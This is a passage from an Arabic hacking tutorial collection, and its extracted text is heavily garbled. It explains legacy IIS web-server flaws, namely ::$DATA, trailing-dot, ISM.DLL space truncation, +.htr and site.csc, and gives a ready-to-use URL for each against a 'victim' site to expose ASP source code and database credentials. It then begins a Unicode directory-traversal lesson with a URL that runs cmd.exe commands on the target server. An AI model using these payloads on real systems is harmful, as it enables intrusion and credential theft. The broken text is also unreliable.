‫ﺘ ﺤﺪﯾﺪﻟﺴﯿ ﺮﻓ ﺮا ت ‪ IIS3.0‬ﻮاﻻنﺗﻌﻤ ﻞ ﻋﻠﻰ‬ ‫ﺘﻬﺎ ﻣﻨﺬاﻟﻌﺎم ‪ .. ١٩٩٨‬وﻫﻲ ﻣﺨﺼﺼﺔﺑﺎﻟ‬ ‫ﻫﺬهاﻟﺜﻐ ﺮةﻛﺎﻧ ﺖﺑﺪاﯾ‬
‫ﺑﻌ ﺾ ﺳﯿ ﺮﻓ ﺮا ت ‪IIS4.0 ..‬‬
‫ﺘﺴﺎ ء ل ﻣﺎﻟﻔﺎﺋﺪة ﻣﻦ ﻋ ﺮ ض ﺳﻮرساﻟﺼﻔ ﺤﻪ ؟؟ ((‬ ‫ﺘﻬﺎ ﻋ ﺮ ضاﻟﺴﻮرسﻛﻮد ﻻي ﺻﻔ ﺤﻪ )) ﺎﻟﺒﻌ ﺾ ﯾ‬ ‫ﻮﻣﻬﻤ‬
‫ﺘﻮي ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ ت ﻣﻬﻤﺔ ﻣﺜ ﻞﻛﻠﻤﺎ ت ﻣ ﺮورﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﻣﺜ ﻞ‬ ‫اﻻﺟﺎﺑﺔانﺑﻌ ﺾاﻟﺼﻔ ﺤﺎ تﺗ ﺤ‬
‫‪Global.asa‬‬
‫ﺘﺼﻔﺢﺑﻮاﺳﻄﺔﻫﺬااﻷﻣ ﺮ ‪http://www.victim.com/default.asp::‬‬ ‫ﯾﻤﻜﻦﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮة ﻣﻦاﻟﻤ‬
‫‪$DATA‬‬

‫‪١١٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪-----------------------‬‬
‫‪ASP dot bug : -‬‬
‫‪-----------------------‬‬
‫ﻗﺪمﺛﻐ ﺮةﻓﻲ ﻫﺬااﻟﻨ ﺺ ﻫﻲ ﻫﺬهاﻟﺜﻐ ﺮة ﺣﯿﺚﺗﻘﻮماﯾ ﻀﺎﺑﻌ ﺮ ضاﻟﺴﻮرسﻛﻮداﻟﺨﺎ صﺑﺄي ﺻﻔ ﺤﻪ ‪..‬‬ ‫رﺑﻤﺎا‬
‫ﺘﺸﺎﻓﻬﺎﻓﻲاﻟﻌﺎم ‪.. ١٩٩٧‬‬ ‫ﺣﯿﺚﺗﻢاﻛ‬
‫ﺘﺼﻔﺢﺑﻬﺬا ﺎﻟﺸﻜ ﻞ ‪:‬‬ ‫ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦاﻟﻤ‬ ‫ﻮﯾ‬
‫‪ http://www.victim.com/sample.asp.‬ﻻ ﺣﻆاﻟﻨﻘﻄﺔاﻟﻤﻮﺟﻮدةﻓﻲا ﺧ ﺮ ﺎﻟﺴﻄ ﺮ‬
‫ﻮﻫﻲﻓﻘﻂﺗﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت ‪IIS3.0 .‬‬

‫‪-------------------------------------------‬‬
‫‪ISM.DLL Buffer Truncation : -‬‬
‫‪-------------------------------------------‬‬
‫ﺧﻄﺄﺑ ﺮﻣﺠﻲ ﯾﺴﻤﺢﻟﻠﻤﻬﺎﺟﻢﺑﺴ ﺤﺐ ﺎﻟﻤﻠﻔﺎ ت ورؤوﯾﺔاﻟﺴﻮرسﻛﻮداﯾ ﻀﺎ ‪..‬‬
‫ﺘ ﺤﺎﯾ ﻞ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﺑﺈﯾﻬﺎﻣﻪاﻧﻨﺎﻗﻤﻨﺎ ﯾﻄﻠﺐ ﻣﻠ ﻒ ﻣﺎ ‪ ..‬وﻓﻲاﻟ ﺤﻘﯿﻘﺔ ﻧ ﺤﻦ ﻧﻘﻮمﺑﻄﻠﺐ‬‫ﻮﻓﻜ ﺮةاﻟﺜﻐ ﺮة ﻫﻲاﻟ‬
‫ﻣﻠ ﻒا ﺧ ﺮ ‪..‬‬
‫ﺘﻢﺗ ﺤﻤﯿﻠﻪﺑﻌﺪدﻛﺒﯿ ﺮ ﻣﻦاﻟ ﺮﻣﻮزاﻟﻤﺴﺎﻓﺔ )‪) ٢٠%‬‬ ‫ﺎﻟﻤﻠ ﻒ ﺎﻟﻤﺴﺆوو ل ﻋﻦﻫﺬااﻟﺨﻄﺄ ﻫﻮ ‪ ISM.dll‬ﺣﯿﺚ ﯾ‬
‫‪Space .‬‬
‫ﯾﻤﻜﻦﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮةﺑﻬﺬااﻟﺸﻜ ﻞ ‪:‬‬
‫‪(...<=230)global.asa.htr http://www.victim.com/global.asa%20‬‬
‫ـ ‪> =٢٣٠‬ﻧﻘﻮمﺑﻮ ﺿﻊ ‪ ٢٣٠‬ﻣﺴﺎﻓﺔﺑﻬﺬااﻟﺸﻜ ﻞ ‪.. %٢٠‬‬ ‫ﻣﻜﺎناﻟ‬
‫ﺘﻬﺎ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮاﻛﺜ ﺮ ﻣﻦ ﻣ ﺮهاﻻ ﺎذا‬ ‫ﻫﺬااﻟﺨﻄﺄ ﯾﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت ‪ IIS 4.0&5.0 ..‬ﻮﻟﻜﻦ ﻻ ﯾﻤﻜﻦﺗﺠ ﺮﺑ‬
‫ﺘﺴﺠﯿ ﻞ ﺧ ﺮوج وﺗﺴﺠﯿ ﻞ د ﺧﻮ ل ‪ ،‬وﯾﻌﻮداﻟﺴﺒﺐﻓﻲ ذﻟﻚاناﻟﺜﻐ ﺮةاﻟﺴﺎﺑﻘﺔﺗﺆدياﻟﻰ ﺎﯾﻘﺎ فاﻟﻤﻠ ﻒ‬ ‫ﻗﺎمﺑ‬
‫‪ISM.dll‬ﻋﻦاﻟﻌﻤ ﻞﻓﻲاﻟﺬاﻛ ﺮةﺑﯿﻨﻤﺎﺗﻄﻠﺐاﻟﺜﻐ ﺮةان ﯾﻜﻮناﻟﻤﻠ ﻒاﻟﻤﺬﻛﻮرﻗﯿﺪاﻟﻌﻤ ﻞ ‪..‬ﻟﺬا ﯾﺠﺐاﻋﺎدة‬
‫ﺗ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒﻓﻲاﻟﺬاﻛ ﺮة ﻣ ﺮها ﺧ ﺮى ‪..‬ايﺑﻤﻌﻨﻰا ﺧ ﺮ ﯾﺠﺐ ﺎن ﯾﻘﻮم ﻣﺪﯾ ﺮاﻟﻨﻈﺎماﻟﻬﺪ فﺑﻌﻤ ﻞاﻋﺎدةﺗﺸﻐﯿ ﻞ‬
‫‪Rebot‬ﺎو ‪Logout & Login .‬‬

‫‪----------‬‬
‫‪+.htr :-‬‬
‫‪---------‬‬
‫ﻫﺬهاﻟﺜﻐ ﺮةاﯾ ﻀﺎﺗﻘﻮمﺑﻌ ﺮ ضاﻟﺴﻮرساﻟﺨﺎ صﺑﻤﻠﻔﺎ ت ‪ASP .‬‬
‫ﺘﺨﺪاﻣﻬﺎﺑﻬﺬااﻟﺸﻜ ﻞ ‪:‬‬ ‫ﯾﻤﻜﻦاﺳ‬
‫‪http://www.victim.com/global.asa+.htr‬‬

‫‪١١٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪----------------‬‬
‫‪site.csc : -‬‬
‫‪----------------‬‬
‫ﻗﻊﺑﻤﺎﻓﻲ ذﻟﻚ ‪DSN, UID‬‬‫ـ ‪ DNS‬ﺎﻟﺨﺎ صﺑﺎﻟﻤﻮ‬ ‫ﺗﻤﻜﻨﻚ ﻫﺬهاﻟﺜﻐ ﺮة ﻣﻦ ﻣﻌ ﺮﻓﺔ ﻣﻌﻠﻮﻣﺎ ت ﻣﻬﻤﺔ ﻋﻦاﻟ‬
‫‪and PASS Database ..‬‬
‫ﺎﻟﺜﻐ ﺮة ‪http://www .victim.com/adsamples/config/site.csc :‬‬
‫ﺳﯿﻘﻮم ﺎﻟﻤﻬﺎﺟﻢﺑﺎﻧﺰا لاﻟﻤﻠ ﻒاﻟﻤﺬﻛﻮر ‪ ..‬وﺳﯿ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﺔ وﻫﺎﻣﺔأﯾ ﻀﺎ …‬

‫‪١١٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"دراﺳﺔ ﻣﻔﺼﻠﺔ وﺑﻌﻤﻖ ﰲ اﻟـ‪"UniCode‬‬

‫‪$$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ACID BURN_EG:‬‬
‫‪$$$$$$$$$$$$$$$$$$$‬‬

‫اﻟﺴﻼم ﻋﻠﯿﻜﻢ ور ﺣﻤﻪا ﷲ وﺑ ﺮﻛﺎﺗﻪ ‪::‬‬


‫ﺎزﯾﻜﻢ ﺷﺒﺎباﯾﻪا ﺧﺒﺎرﻛﻢﻛﻠﻜﻢ ؟اﺗﻤﻨﻰﺗﻜﻮﻧﻮاﺑﺨﯿ ﺮو‪.‬‬
‫ﺘﻰ واﻧﻘﻄﺎﻋﻰ ﻋﻨﻜﻢ وﻟﻜﻦ وا ﷲ ﻇ ﺮو ف رﻫﯿﺒﻪ‬ ‫ﺎﻋﺬروﻧﻰ ﻋﻠﻰ ﻏﯿﺒ‬
‫ﻮ ﺎﻻن ﺧﻠﻮﻧﺎ ﻧ ﺮﻏﻰﻓﻰ ﺷﻮﯾﻪﻛﻼمﻓﺎ ﺿﻰ ﻋﻠﻰ رأىﺑ ﺮوﻛﻦ‬
‫ﺘ ﺤﺪ ث‬‫ﺘﻠﻔﻪ و ﻫﻰﺗ‬‫ﺘ ﺮﻧ ﺖ وادﻋﺒﺚ ﺷﻮى وﺑﻌﺪﯾﻦ ﺟﻤﻌ ﺖﺑﻌ ﺾ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت ﻣﻦ ﻣﻠﻔﺎ ت ﻣﺨ‬ ‫ﻛﻨ ﺖاﺗﺼﻔﺢاﻻﻧ‬
‫ﻗﻮﻟﻪ‬ ‫ﺘﻌﺠ ﻞ و ﯾﻘﻮ ل ﯾﺎههههه ﯾﻮﻧﻰﻛﻮدﻗﺪﯾﻤﻪ ‪....‬اﻟ ﺦ ( وﻟﻜﻦاﻧﺎا‬ ‫ﻋﻦاﻟﯿﻮﻧﻰﻛﻮد ) ﻃﺒﻌﺎ ﺎﻻن ﻣﻌﻈﻤﻜﻢ ﺳﯿﺴ‬
‫ﺘ ﺮ و ﻣ ﺮه ﻣﻦ ﺎﻻ خ ﻫﻜ ﺲ و‬ ‫ﺘﺪﯾﺎ تﺛﻼ ث ﻣ ﺮا ت ﻣ ﺮه ﻋﻦاﻟﺼﺪﯾ ﻖﺑﻼكﻫﻨ‬‫ا ﺻﺒ ﺮﻟﻘﺪ ذﻛ ﺮ تاﻟﯿﻮﻧﻰﻛﻮدﻓﻰاﻟﻤﻨ‬
‫ﺘﻼ ف ﻋﻦاﻟﻤ ﺮا ت‬ ‫ﺘﻠﻔﻪﺗﻤﺎماﻻ ﺧ‬ ‫ﺘﻜﻮن ﻣﺨ‬ ‫ﻗﻮﻧﻰ ﺳ‬ ‫ﻣ ﺮه ﻋﻦاﻟﺼﺪﯾ ﻖ دﯾﻤﻮناواﺑﻮ ﺧﻠﻮدﻟﻜﻦﻫﺬهاﻟﻤ ﺮه ﺻﺪ‬
‫اﻟﺴﺎﺑﻘﻪ) ‪(Trust Me‬‬
‫ﻮاﻻن دﻋﻮﻧﺎ ﻣﻦﻫﺎاﻟﺨ ﺮاﺑﯿﻂ و ﺧﻠﻮﻧﺎ ﻧﻘﻮ لاﻟﺪرس ﯾﻤﻜﻦ ﯾﻌﺠﺒﻜﻢ‪::‬‬
‫><><><><><><><><><><><><><><><><><><><><><><><><><><><><><‬

‫ﺘﻰ وﺟﺪ تاﻟﯿﻮﻧﻰﻛﻮد؟‬


‫ﻣ‬
‫‪Found On 15 May 2001 BY NSFOCUS‬‬

‫ﺛ ﺮﺑﺎﻟﺜﻐ ﺮه ﻫﻰ‪::‬‬
‫ﺘﺄ‬‫ﺘﻰﺗ‬
‫ﺘﯿﻤﺰاﻟ‬
‫ﺎﻟﺴﯿﺴ‬
‫‪All running IIS 4 / IIS 5 web server‬‬
‫‪Windows 2k‬‬
‫‪Windows 2k SP1 + SP2‬‬

‫ﺛﻐ ﺮهاﻟﯿﻮﻧﻰﻛﻮد ‪::‬ﻫﻰ ﻋﺒﺎره ﻋﻦﺛﻐ ﺮهﺗﺴﻤﺢﻟﻠﻬﺎﻛ ﺮﺑﺄن ﯾﺸﻐ ﻞاواﻣ ﺮﺑﺎﻟﻘﻮهﺑﺼﻼ ﺣﯿﻪ ﻣﺴﻤﻮ حﺑﻬﺎ )اى‬
‫ﺘﯿﺎز) ‪IUSR_machinename account‬‬ ‫ﯾﻜﻮنﻟﻪاﻣ‬

‫ﺘﯿﺠﻪان روﺗﯿﻦا ل ‪ cgi‬ﺎﻟﻤﻮﺟﻮد ﻋﻠﻰاﻟﻮﯾﺐ ﺳ ﺮﻓ ﺮ ﻧﻔﺴﻪ ﯾﻔﻚ ﺷﻔ ﺮه ﻋﻨﻮان‬ ‫ﻮﺗ ﺤﺪ ثﻫﺬهاﻟﺜﻐ ﺮها ﺻﻼ ﻧ‬
‫ﺘﻔﻬﻢﺑﻌﺪ ذﻟﻚ (‬
‫ـ ‪ )DeCode‬ﻻﺗﻘﻠ ﻖ ﺳ‬ ‫ﻗﻊ ﻣﺮﺗﯿﻦ و ﻫﺬا ﻣﺎ ﻧﺴﻤﯿﻪﺑﺎﻟ‬‫ﺎﻟﻤﻮ‬

‫ﺗﻌﺎﻟﻰ ﻣﻌﻰ ﺧﻠﯿﻨﻰاو ﺿ ﺤﻠﻚاﯾﻪاﻟﺨ ﺮاﺑﯿﻂاﻟﻰاﻧﺎﻛﺎﺗﺒﻬﺎﻓﻮ ق دى‬

‫ﻮﻟﯿﻜﻦ ﻣﺜﻼ ‪::‬‬


‫‪===> http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c‬ﺛﻐ ﺮه ﯾﻮﻧﻰﻛﻮد‬

‫ﻗﻊاﻟﻤﺼﺎبﺑﺎﻟﺜﻐ ﺮهاﻟﻤﺬﻛ ﺮوه‬


‫‪ ====> http://iisserver/‬ﺳﯿﻜﻮن ﻫﺬاﻫﻮ ﻫﺪﻓﻨﺎاىاﻟﻤﻮ‬

‫ﺘﯿﺎزا تﺗﻨﻔﯿﺬﯾﻪ ﻋﻠﻰ ﺎﻟﺴ ﺮﻓ ﺮ )اى ﯾﻤﻜﻦﻟﻠﯿﻮزرﺗﻨﻔﯿﺬاىاﻣ ﺮ ﻋﻠﻰ‬


‫‪* /scripts/ -‬ﻮ ﻫﺬااﻟﻔﻮﻟﺪرﻟﺪﯾﻪاﻣ‬
‫ﺘ ﺲا ل ‪ cgi‬ﺎﻟﻤﻮﺟﻮده ﻋﻠﻰاﻟﻮب‬
‫ﺘﺨﺪمﻓﻰﺗﻨﻔﯿﺬ ﺳﻜ ﺮﺑ‬ ‫اﻟﻮب ﺳ ﺮﻓ ﺮ ﻣﻦ ﺧﻼﻟﻪ ( وﻫﺬااﻟﻔﻮﻟﺪراﯾ ﻀﺎ ﻫﻮاﻟﻤﺴ‬

‫‪١١٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻨﻔﯿﺬىاى) ‪executable directory‬‬


‫ﺘ ﺤﺪﯾﺪ ﻫﺬااﻟﻔﻮﻟﺪر ﯾﺴﻤﻰاﻟﻔﻮﻟﺪراﻟ‬
‫ﺳ ﺮﻓ ﺮ وﺑﺎﻟ‬

‫ﻮ ﻃﺒﻌﺎﻫﺬااﻟﻔﻮﻟﺪرﻟﯿ ﺲﻟﻪاﺳﻢﺛﺎﺑ ﺖﻫﺬاﻓﻘﻂ ﻣﺜﺎ ل وﻟﻜﻦ ﯾﻤﻜﻦان ﯾﻜﻮنﻟﻪاﺳﻤﺎ ءﻛﺜﯿ ﺮه ﻋﻠﻰاﻟﻤﻠﻘﻢ ‪ iis‬ﻮ‬
‫ﺘﻨﻔﯿﺬىاى ‪executable directory‬‬ ‫ﻣﻠ ﺤﻮﻇﻪ ﻫﺎﻣﻪ‪::‬ﻻ ﯾﻮﺟﺪ ﻋﻠﻰﻛ ﻞ ﻣﻠﻘﻢ ‪iis‬ﻫﺬااﻟﻔﻮﻟﺪراﻟ‬

‫ﺘﻮرزﻓﻰ ﺷ ﺮ ﺣﻬﻢ )ﻓﺄﻧﺎارﯾﺪ‬


‫ﺘ ﺮ واﻻ خ ﻫﻜ ﺲﻗﺪ ذﻛ ﺮو ﻣﻌﻈﻢاﺳﺎﻣﻰ ﻫﺬه ﺎﻟﺪﯾ ﺮﯾﻜ‬
‫ﺘﻘﺪاناﻟﺼﺪﯾ ﻖﺑﻼك ﻫﻨ‬
‫ﻮاﻋ‬
‫ﺘﻜﺎﻣﻠﻪ (‬‫ﺘﻰﺗﻜﻮن ﺳﻠﺴﻠﻪ ﻣ‬ ‫انارﺑﻂاﻟﺪروس ﻣﻊﺑﻌ ﺾ ﺣ‬

‫>=== ‪* winnt/system32/cmd.exe‬ﻮ ﻃﺒﻌﺎ ﻫﺬاﻫﻮا ل ‪ cmd‬ﺎﻟﺬى ﯾﺴﻤﺢﻟﻨﺎﺑﺄدراج ﺳﻄﻮر‬


‫ﺘﺨﺪاماواﻣ ﺮ ﻣﺜ ﻞ ‪ ping‬ﻮ‬
‫ﺘﻌﻤ ﻞ ﻫﺬاا ل ‪cmd‬ﻓﻰ ﺎﺳ‬ ‫ﺘﻰ ﻧ ﺮﯾﺪﺗﻨﻔﯿﺬﻫﺎ )و ﻋﻠﻰﻓﻜ ﺮه ﻣﻤﻜﻦﺗﺴ‬
‫اﻻواﻣ ﺮاﻟ‬
‫ﺘﻘﺪاﻧﻬﺎﻓﻜ ﺮهﻟﻢ ﯾﻼ ﺣﻈﻬﺎﺑﻌ ﻀﻨﺎ (‬
‫‪netstat‬ﻮ‪ traceroute ....‬ﺎﻟ ﺦاﻋ‬

‫ﺘﻰ‬ ‫ﺘﻔﻬﺎمﻓﻰ ﻫﺬهاﻟﺜﻐ ﺮهﻟﻬﺎ ﺪورﻓﻬﺬهاﻟﻌﻼﻣﻪﺗﻌﻨﻰاﻟ ﺤﺎﻟﻪاﻟ‬ ‫ﺘﻰ ﻋﻼﻣﻪاﻻﺳ‬ ‫ﺘﻔﻬﺎمﺗﺨﯿﻠﻮ ﺣ‬ ‫*؟‪ -‬ﻋﻼﻣﻪاﻻﺳ‬
‫ﺘﻔﻬﺎمﺗﻌﻨﻰﻛﻠﻤﻪ‬ ‫ﯾﻨﻔﺬﺑﻬﺎاﻻﻣ ﺮ ) ﻃﺒﻌﺎ ﻣ ﺶﻓﺎﻫﻢ ﯾﻌﻨﻰاﯾﻪ ( وﻻ ﯾﻬﻤﻚﺗﻌﺎﻟﻰ ﻣﻌﻰاﻓﻬﻤﻚ ﯾﻌﻨﻰاﯾﻪ ﻋﻼﻣﻪاﻻﺳ‬
‫ﺘﻰ ﺳﯿﻨﻔﺬﺑﻬﺎاﻻﻣ ﺮاىاﻧﻪاﻣ ﺮ ﻣﺜﻼ ﯾﻨﻔﺬﻓﻰﻟ ﺤﻈﻪﺛﻢ‬ ‫ﺘﻰﺗﻌﻨﻰاﻟ ﺤﺎﻟﻪاﻟ‬ ‫‪argument‬ﻮ ﻫﺬهاﻟﻜﻠﻤﻪ ﻫﻰاﻟ‬
‫ﺘﻰ‬ ‫ﺘﻤ ﺮ ﻣﻔﻌﻮﻟﻪ و ﺣﻘﯿﻘﻪان ﻃﺒﻌﺎ ﻣﻌﻈﻢاﻻواﻣ ﺮ ﺎﻟ‬
‫ﺘﻬﻰ ﻣﺜ ﻞ ‪ copy‬ﻣﺜﻼاماﻧﻪاﻣ ﺮ ﻣﺜﻼ ﯾﻨﻔﺬ وﻟﻜﻦ ﯾﺴ‬ ‫ﯾﻨ‬
‫ﺘﺨﺪﻣﻬﺎ ﻫﻰاﻻواﻣ ﺮاﻟﻌﺎدﯾﻪ وﻫﻰ ﻣﻦ ﻧﻮ ع ‪ argument /c‬ﻮ ﻫﺬاا ل ‪ /c‬ﯾﻌﻨﻰان ﺎﻻﻣ ﺮ ﯾﻨﻔﺬﻓﻰﻟ ﺤﻈﻪ‬ ‫ﻧﺴ‬
‫ﺘﻬﻰ‬‫ﺛﻢ ﯾﻨ‬
‫ﺘﺮ‬‫ﺘﺐ ﻫﺬا )?‪ (cmd /‬ﻮا ﺿﻐﻂاﻧ‬ ‫ﺘﺎﻋﻚ واﻛ‬‫ﺘﺢا ل ‪cmd‬ﺑ‬ ‫ﺗﻌﺎﻟﻰاﻓﻬﻤﻚاﻛﺜ ﺮ ‪::‬ﻟﻮ ﻋﻨﺪك وﯾﻨﺪوز ‪٢٠٠٠‬اﻓ‬
‫ﻗﻰ‬‫ﺘﻮ ﺿﯿﺢ واﻧ ﺖ ﻋﻠﯿﻚاﻟﺒﺎ‬
‫ﺘ ﺮ ت ﻣﻨﻪ ﺟﺰ ءﺑﺴﯿﻂﻓﻘﻂﻟﻠ‬ ‫‪ ،‬ﺳﯿﻈﻬ ﺮﻟﻚﻛﻼمﻛﺜﯿ ﺮ ﺟﺪاا وﻟﻜﻨﻰا ﺧ‬
‫ﺷﻮ فاﯾﻪاﻟﻰ را ح ﯾﻈﻬ ﺮﻟﻚ‪::‬‬
‫‪Starts a new instance of the Windows 2000 command interpreter‬‬

‫]‪CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF‬‬
‫]‪[[/S] [/C | /K] string‬‬
‫‪/C Carries out the command specified by string and then terminates‬‬
‫‪/K Carries out the command specified by string but remains‬‬
‫)‪/S Modifies the treatment of string after /C or /K (see below‬‬
‫‪/Q Turns echo off‬‬
‫)‪/D Disable execution of AutoRun commands from registry (see below‬‬

‫ﻫﺬا ﺟﺰ ءﺑﺴﯿﻂ ﺟﺪاا ﻣﻤﺎ را ح ﯾﻈﻬ ﺮﻟﻚ وﻟﻜﻦﺗﻌﺎﻟﻰ ﻧﺸﻮ ف ﻫﺬااﻟﺠﺰ ءاﯾﻪ ﻣﻌﻨﺎهاوﻻ ﯾﻘﻮﻟﻚ ‪::‬‬
‫‪Starts a new instance of the Windows 2000 command interpreter‬ﻮﻫﺬه‬
‫ﺘ ﺮﺟﻢا ل وﯾﻨﺪوز ‪ ٢٠٠٠‬ﻮ ﻫﺬا ﻃﺒﻌﺎ و ﺿﺢﻟﻨﺎانﻛ ﻞ ‪cmd‬‬ ‫اﻟﺠﻤﻠﻪﺗﻌﻨﻰﺑﺎﻟﻌ ﺮﺑﯿﻪﺑﺪاﯾﻪ ﺣﺎﻟﻪ ﺟﺪﯾﺪه ﻣﻦ ﻣ‬
‫ﺘﺢاو ﯾﻐﻠ ﻖ ﺎ ل ‪arguments .‬ﻮﺑﻌﺪﻫﺎ ﯾﻈﻬ ﺮﻟﻨﺎ‬ ‫ﺘﻪ ﺣﺴﺐ ﻣﺎ ﯾﻔ‬ ‫ﺘﺨﻜ ﻢ ﺻﺎ ﺣﺒﻪﻓﻰ ﺣﺎﻟ‬ ‫ﯾﻤﻜﻦان ﯾ‬
‫ﺘﻮباﻣﺎﻣﻪ ‪::‬‬ ‫ﺘﻌﻤﻠﻪ داﺋﻤﺎﻓﻰ ﺎﻟﺜﻐ ﺮه وﻫﻮ ‪ /c‬ﺷﻮﻓﻮﻛﺪه ﻣﺎاﻟﻤﻜ‬ ‫‪arguments‬ﻛﺜﯿ ﺮه و ﻣﻨﻬﺎاﻟﺬى ﻧﺴ‬
‫‪Carries out the command specified by string and then terminates‬ﻮ ﻫﺬا‬
‫ﺘﻰ ﻧﻌ ﺮﻓﻬﺎ‬‫ﺘﻬﻰ و ﻃﺒﻌﺎ ﻫﺬاﻟﻼواﻣ ﺮاﻟﻌﺎدﯾﻪاﻟ‬‫اﻟﻜﻼم ﻣﻌﻨﺎهاﻧﻪ ﯾﻨﻔﺬاﻻﻣ ﺮاﻟﻤﻮﺟﻮدﻓﻰ ﺳﻄ ﺮ ﺎﻻواﻣ ﺮﺛﻢ ﯾﻨ‬
‫ﺘﻜﻠﻢ ﻋﻦ ‪ argument‬ﻻ ﻧ ﺮاهﻓﻰﺛﻐ ﺮهاﻟﯿﻮﻧﻰﻛﻮد و ﻫﻮ‬ ‫ﺘﯿﻪ ‪ ::‬ﺳﻮ ف ﻧﺠﺪاﻧﻪ ﯾ‬ ‫ﺗﻌﺎﻟﻮ ﻧﺸﻮ فاﻟﺴﻄ ﺮاﻟﻰﺗ ﺤ‬
‫ﺘﻮباﻣﺎﻣﻪ‪::‬‬ ‫ا ل ‪ /k‬ﺷﻮﻓﻮ ﺎﯾﻪ ﻣﻜ‬
‫‪Carries out the command specified by string but remains‬ﻮ ﻃﺒﻌﺎ ﻣﻌﻨﺎهاﻧﻪ‬
‫ﺘﻤ ﺮ ﻣﻔﻌﻮﻟﻬﺎ )ﻣﺎ زﻟ ﺖاﺑ ﺤﺚ ﻋﻦاواﻣ ﺮ ﻣﺜ ﻞ ﻫﺬه وﻟﻜﻦ ﻫﺬا ﻣﺎ‬ ‫ﯾﻨﻔﺬاﻻواﻣ ﺮاﻟﻤﻮﺟﻮدهﻓﻰاﻟﺴﻄ ﺮ وﻟﻜﻦ ﯾﺴ‬

‫‪١١٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﯿﻦ ﻣﺜ ﻞ ‪ ping‬ﻣﺜﻼ (‬ ‫ﺘ ﺮه ﻃﻮﯾﻠﻪ ﺣﺒ‬‫ﺘﻰﺗﺄ ﺧﺬﻓ‬ ‫ﺘﻮباﻣﺎﻣﻰ وﻟﻜﻦﺗﻘﺪرﺗﻘﻮ لاﻧﻬﺎاﻻواﻣ ﺮاﻟ‬ ‫ﻫﻮ ﻣﻜ‬
‫ﺘﺨﺪﻣﻪﻓﻰاﻏﻼ قﺗﻔﻌﯿ ﻞاﻣ ﺮ ‪echo‬ﻛﻤﺎ ﻫﻮ وا ﺿﺢﻓﻰ‬ ‫ﻮ ﻣﺜﻼﻫﻨﺎك ‪argument‬ﺄ ﺧ ﺮ ﻣﺜ ﻞ ‪ /Q‬ﻮ ﻫﺬا ﻧﺴ‬
‫اﻟﻤﺜﺎ لﻓﻮ ق‬
‫ﺘ ﺤﻪاو‬ ‫ﺘ ﺤﻜﻢﻓﯿﻪ )ﯾﻌﻨﻰﻓ‬ ‫ﻮ ﻫﻨﺎكاﻟﻜﺜﯿ ﺮ ﻣﻦ ﻫﺬها ل ‪ arguments‬ﻮ ﻃﺒﻌﺎ ﻣﻨﻬﺎ ﻣﺎ ﻫﻮاﺳﺎﺳﻰ ﻻ ﯾﻤﻜﻨﻚاﻟ‬
‫ﺘ ﺤﻜﻢﺑ ﺤﺎﻟﻪا ل‬ ‫ﻏﻠﻘﻪ ﻣﺜ ﻞا ل ‪ /c‬ﻮا ل ) ‪ /k‬ﻮ ﻫﻨﺎكا ﺧ ﺮﯾﻦ ﯾﻤﻜﻨﻚانﺗﺠﻌﻠﻬﻢ ‪ on‬ﺎو ‪ off‬ﻮﺑﻬﺬاﺗﻜﻮناﻧ ﺖﺗ‬
‫ﺘﻔﺼﯿ ﻞ ( و‬ ‫ﺘﺢ ﻮاﻟﻐﻠ ﻖﺑﺎﻟ‬ ‫ﻗﻰﺗﻔﺎ ﺻﯿ ﻞاﻟﻔ‬ ‫ﺘﻮب ﻻﻧﻚ را حﺗﻼ‬ ‫ﺘﻚ )ﯾﺎرﯾ ﺖﺗﻨﻔﺬاﻻﻣ ﺮ وﺗﻘ ﺮأاﻟﻤﻜ‬ ‫‪ cmd‬ﺧﺎﺻ‬
‫ﺘ ﺤﺎناﻻو لﻓﻰ ‪MCSE‬ﻓﻰ ﺧﻼ لاﺳﺒﻮﻋﯿﻦان ﺷﺎ ءا ﷲﺗﻌﺎﻟﻰ وﺑﻌﺪ‬ ‫ﺘﻬﻰ ﻣﻦاﻻﻣ‬ ‫ﺘﻰاﻧ‬‫ا ﺻﺒ ﺮوا ﻋﻠﻰﻗﻠﯿﻼ ﺣ‬
‫ﺘﻔﺼﯿ ﻞان ﺷﺎ ءا ﷲﺑ ﺲاﺻﺒ ﺮو ﺷﻮى‬ ‫ذﻟﻚ ﻧﻌﻮداﻛﺜ ﺮﻗﻮه و ﻧﺸ ﺮ حﻟﻜﻢ ﻫﺬهاﻟﻨﻘﻄﻪﺑﺎﻟ‬
‫ﺘﺄﻛﺪاﻧﻚ ﻻ‬ ‫ﺘﺒﻬﺎﻓﻰاﻟﺜﻐ ﺮه واﻧﺎ ﻣ‬ ‫ﺘﻰﺗﻜ‬ ‫ﺘﻘﺪاﻧﻚاﻻنﻓﻬﻤ ﺖ ﻣﺎ ﻫﻰا ل ‪ arguments‬ﻮ ﻣﺎﻓﺎﺋﺪه ‪ /c‬ﺎﻟ‬ ‫ﺎﻋ‬
